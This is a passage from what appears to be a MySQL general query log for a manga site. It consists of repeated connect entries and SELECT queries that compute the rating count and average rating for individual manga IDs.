'76' order by created desc 330646543 Quit 330646544 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646544 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330646544 Quit 330646545 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646545 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330646545 Quit 330646546 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646546 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330646546 Quit 330646547 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646547 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330646547 Quit 330646548 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646548 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330646548 Quit 330646549 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646549 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330646549 Quit 330646550 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646550 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330646550 Quit 330646551 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646551 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330646551 Quit 330646552 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646552 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330646552 Quit 330646553 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646553 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330646553 Quit 330646554 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646554 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330646554 Quit 330646555 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646555 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330646555 Quit 330646556 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646556 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330646556 Quit 330646557 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646557 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330646557 Quit 330646558 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646558 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330646558 Quit 330646559 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646559 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330646559 Quit 330646560 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646560 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330646560 Quit 330646561 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646561 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330646561 Quit 330646562 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646562 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330646562 Quit 330646563 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646563 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330646563 Quit 330646564 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646564 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330646564 Quit 330646565 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646565 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330646565 Quit 330646566 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646566 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330646566 Quit 330646567 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646567 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330646567 Quit 330646568 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646568 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330646568 Quit 330646569 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646569 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330646569 Quit 330646570 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646570 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330646570 Quit 330646571 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646571 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330646571 Quit 330646572 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646572 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330646572 Quit 330646573 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646573 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330646573 Quit 330646574 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646574 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330646574 Quit 330646575 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646575 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330646575 Quit 330646576 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646576 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330646576 Quit 330646577 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646577 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330646577 Quit 330646578 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646578 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330646578 Quit 330646579 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646579 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330646579 Quit 330646580 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646580 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330646580 Quit 330646581 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646581 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330646581 Quit 330646582 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646582 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330646582 Quit 330646583 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646583 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330646583 Quit 330646584 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646584 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330646584 Quit 330646585 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646585 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330646585 Quit 330646586 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646586 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330646586 Quit 330646587 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646587 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330646587 Quit 330646588 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646588 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330646588 Quit 330646589 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646589 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330646589 Quit 330646590 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646590 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330646590 Quit 330646591 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646591 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330646591 Quit 330646592 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646592 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330646592 Quit 330646593 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646593 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330646593 Quit 330646594 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646594 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330646594 Quit 330646595 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646595 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330646595 Quit 330646596 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646596 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330646596 Quit 330646597 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646597 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330646597 Quit 330646598 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646598 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330646598 Quit 330646599 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646599 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330646599 Quit 330646600 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646600 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330646600 Quit 330646601 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646601 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330646601 Quit 330646602 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646602 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330646602 Quit 330646603 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646603 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330646603 Quit 330646604 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646604 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330646604 Quit 330646605 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646605 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330646605 Quit 330646606 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646606 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330646606 Quit 330646607 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646607 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330646607 Quit 330646608 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646608 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330646608 Quit 330646609 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646609 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330646609 Quit 330646610 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646610 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330646610 Quit 330646611 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646611 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330646611 Quit 330646612 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646612 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330646612 Quit 330646613 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646613 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330646613 Quit 330646614 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646614 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330646614 Quit 330646615 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646615 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330646615 Quit 330646616 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646616 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330646616 Quit 330646617 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646617 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330646617 Quit 330646618 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646618 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330646618 Quit 330646619 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646619 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330646619 Quit 330646620 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646620 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330646620 Quit 330646621 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646621 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330646621 Quit 330646622 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646622 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330646622 Quit 330646623 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646623 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330646623 Quit 330646624 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646624 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330646624 Quit 330646625 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646625 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330646625 Quit 330646626 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646626 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330646626 Quit 330646627 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646627 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330646627 Quit 330646628 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646628 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330646628 Quit 330646629 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646629 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330646629 Quit 330646630 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646630 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330646630 Quit 330646631 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646631 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330646631 Quit 330646632 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646632 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330646632 Quit 330646633 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646633 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330646633 Quit 330646634 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646634 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330646634 Quit 330646635 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646635 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330646635 Quit 330646636 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646636 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330646636 Quit 330646637 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646637 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330646637 Quit 330646638 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646638 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330646638 Quit 330646639 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646639 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330646639 Quit 330646640 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646640 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330646640 Quit 330646641 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646641 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330646641 Quit 330646642 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646642 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330646642 Quit 330646643 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646643 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330646643 Quit 330646644 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646644 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330646644 Quit 330646645 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646645 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330646645 Quit 330646646 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646646 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330646646 Quit 330646647 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646647 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330646647 Quit 330646648 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646648 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330646648 Quit 330646649 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646649 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330646649 Quit 330646650 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646650 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330646650 Quit 330646651 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646651 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330646651 Quit 330646652 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646652 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330646652 Quit 330646653 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646653 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330646653 Quit 330646654 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646654 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330646654 Quit 330646655 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646655 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330646655 Quit 330646656 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646656 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330646656 Quit 330646657 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646657 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330646657 Quit 330646658 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646658 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330646658 Quit 330646659 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646659 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330646659 Quit 330646660 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646660 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330646660 Quit 330646661 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646661 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330646661 Quit 330646662 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646662 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330646662 Quit 330646663 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646663 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330646663 Quit 330646664 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646664 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330646664 Quit 330646665 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646665 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330646665 Quit 330646666 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646666 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330646666 Quit 330646667 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646667 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330646667 Quit 330646668 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646668 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330646668 Quit 330646669 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646669 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330646669 Quit 330646670 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646670 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330646670 Quit 330646671 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646671 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330646671 Quit 330646672 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646672 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330646672 Quit 330646673 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646673 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330646673 Quit 330646674 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646674 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330646674 Quit 330646675 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646675 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330646675 Quit 330646676 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646676 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330646676 Quit 330646677 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646677 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330646677 Quit 330646678 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646678 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330646678 Quit 330646679 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646679 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330646679 Quit 330646680 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646680 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330646680 Quit 330646681 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646681 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330646681 Quit 330646682 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646682 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330646682 Quit 330646683 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646683 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330646683 Quit 330646684 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646684 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330646684 Quit 330646685 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646685 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330646685 Quit 330646686 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646686 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330646686 Quit 330646687 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646687 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330646687 Quit 330646688 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646688 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330646688 Quit 330646689 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646689 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330646689 Quit 330646690 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646690 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330646690 Quit 330646691 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646691 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330646691 Quit 330646692 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646692 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330646692 Quit 330646693 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646693 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330646693 Quit 330646694 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646694 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330646694 Quit 330646695 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646695 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330646695 Quit 330646696 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646696 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by 